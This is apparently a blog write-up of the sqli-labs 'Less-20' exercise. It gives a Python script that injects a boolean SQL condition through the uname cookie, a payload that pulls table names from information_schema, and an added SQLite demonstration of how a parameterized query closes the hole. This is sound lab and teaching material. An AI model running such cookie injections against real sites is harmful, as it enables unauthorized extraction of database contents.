Less-20

The injection point is in the cookie.

A Python script handles the blind injection:

# -*- coding: utf-8 -*-
# r 1151 e 1079
import requests as req

# Boolean test condition carried in the uname cookie
cookie = "uname=admin' and 1=1#"
header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0",
    "Cookie": cookie,
}
url = 'https://sql.alienwares.top/Less-20/index.php'
res = req.get(url, headers=header)
# print(len(res.content))
# The script treats a response containing slap1.jpg as the false/error case
if '../images/slap1.jpg' in res.content.decode('utf-8'):
    print('error')
else:
    print('success')

SQL statement

select mid((SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()),1,1)='e'

For the Python script, see the earlier write-ups.
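Added example, not from the original post: why the `and 1=1` / `and 1=2` cookie test acts as a true/false oracle when the `uname` value is concatenated into the query, and how a bound parameter removes it. SQLite stands in for the lab's MySQL, so the `#` comment is written as `--`; the table, rows and function names are constructed for illustration.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the lab's users table (assumption, not the lab schema).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-secret')")
    return db


def cookie_value(cookie_header, name="uname"):
    # Minimal Cookie header parsing: "k=v; k2=v2" -> value stored under `name`.
    for part in cookie_header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return value
    return None


def lookup_vulnerable(db, uname):
    # Weak form: the cookie value becomes part of the SQL text.
    sql = "SELECT username FROM users WHERE username='" + uname + "' LIMIT 1"
    try:
        return db.execute(sql).fetchone()
    except sqlite3.Error:
        return None


def lookup_parameterized(db, uname):
    # Hardened form: the cookie value is bound as data and never parsed as SQL.
    sql = "SELECT username FROM users WHERE username=? LIMIT 1"
    return db.execute(sql, (uname,)).fetchone()


def has_boolean_oracle(lookup, db):
    # True when the response differs between an always-true and an always-false
    # condition, which is the signal the blind test on this page relies on.
    true_case = lookup(db, cookie_value("uname=admin' and 1=1--"))
    false_case = lookup(db, cookie_value("uname=admin' and 1=2--"))
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks an oracle:", has_boolean_oracle(lookup_vulnerable, db))
    print("parameterized query leaks an oracle:", has_boolean_oracle(lookup_parameterized, db))
```

With the bound parameter, both test cookies are looked up as literal usernames that do not exist, so the two responses are identical and carry no information.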

posted @ 2021-01-14 13:02  PointerK